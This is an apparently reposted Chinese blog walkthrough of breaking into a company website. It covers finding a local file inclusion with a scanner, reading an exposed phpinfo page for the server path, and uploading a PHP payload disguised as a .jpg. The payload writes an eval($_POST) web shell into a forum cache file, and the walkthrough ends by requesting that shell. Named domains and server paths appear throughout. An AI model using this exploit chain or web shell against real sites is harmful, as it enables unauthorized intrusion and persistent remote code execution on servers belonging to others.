概述
主站是:www.xxxx.biz
环境:linux php nginx,伪静态的。
主站基本是没希望,不过xss很多,懒得去利用。
有公司有一个新新业务,所以开发部门建立了一个新的网站,所以我也就..........开始看了下dz 7.5的,自己修改了一些东西,尝试了公开的0DAY没戏,各种尝试无果。
最后丢到wvs里面一扫,一会就出来了一个本地包含漏洞,详细继续。
根据WVS扫描结果,漏洞发生在以下页面:
&id=17
这是一个很明显的本地文件包含漏洞
但是这个漏洞使用相对路径来进行包含是不成功的,要使用绝对路径,在以下文件发现phpinfo信息
http://www.cntuike.net/info.php
发现网站绝对路径为
/data0/htdocs/www.dxg.com/view/
于是用WVS的HTTPEDITOR进行访问
此时你已经发现info.php已经被成功包含并执行了
接下来要构造你自己的webshell,通常情况下就是通过上传。在网站上发现了注册会员服务,注册一个账号之后,在用户中心的企业新闻里面新增一个新闻,然后上传一个内容是:
<?php
$fp = @fopen("/data0/htdocs/www.dxg.com/view/bbs/forumdata/cache/cache_1.php", 'a');
@fwrite($fp, '<'.'?php'."rnrn".'eval($_POST[chen]);'."rnrn?".">rn");
@fclose($fp);
?>
上传成功后可以看到是一个相对路径
/uploads/contentImg/news/201204/10/133404553855857.jpg
将两者合并起来
/data0/htdocs/www.dxg.com/view/uploads/contentImg/news/201204/10/133404553855857.jpg
于是再用WVS访问
成功之后直接访问
http://www.cntuike.net/bbs/forumdata/cache/cache_1.php
-
3212323.jpg (12.07 KB)
转载于:https://www.cnblogs.com/mujj/articles/2781900.html
最后
以上就是虚幻项链为你收集整理的文件包含漏洞对公司测试的全部内容,希望文章能够帮你解决文件包含漏洞对公司测试所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复